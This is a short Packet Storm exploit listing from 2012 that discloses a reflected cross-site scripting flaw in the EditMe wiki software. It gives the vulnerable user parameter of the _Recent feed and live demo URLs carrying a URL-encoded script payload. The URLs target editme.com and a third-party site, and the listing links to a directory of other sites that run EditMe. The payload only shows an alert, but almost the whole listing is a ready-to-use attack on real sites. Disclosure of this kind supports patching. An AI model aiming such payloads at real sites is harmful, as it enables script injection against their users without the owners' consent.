EditMe Cross Site Scripting

2012-03-04T00:00:00
ID PACKETSTORM:110432
Type packetstorm
Reporter Sony
Modified 2012-03-04T00:00:00

Description

                                        
                                            `# Exploit Title: EditMe Cross Site Scripting  
# Date: 4.03.2012  
# Author: Sony  
# Software Link: http://www.editme.com/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/03/editme-cross-site-scripting.html  
..................................................................  
  
/_Recent?feed=user&user=[our xss is here]  
  
Demo:  
  
http://www.editme.com/_Recent?feed=user&user=%3Cscript%3Ealert%28%22EditMe%20Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://3.bp.blogspot.com/-ZXYKrYpy7z8/T1MksAcl1LI/AAAAAAAAAr8/ayezykYyDWs/s1600/editme1.JPG  
  
http://www.governmentcloudcomputing.info/_Recent?feed=user&user=%3Cscript%3Ealert%28%22EditMe%20Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-5lUI4Vkf__c/T1MkxjmihtI/AAAAAAAAAsI/wdkg1jNmQcQ/s1600/editme2.JPG  
  
Who use EditMe?  
  
http://www.editme.com/EditMeSites  
`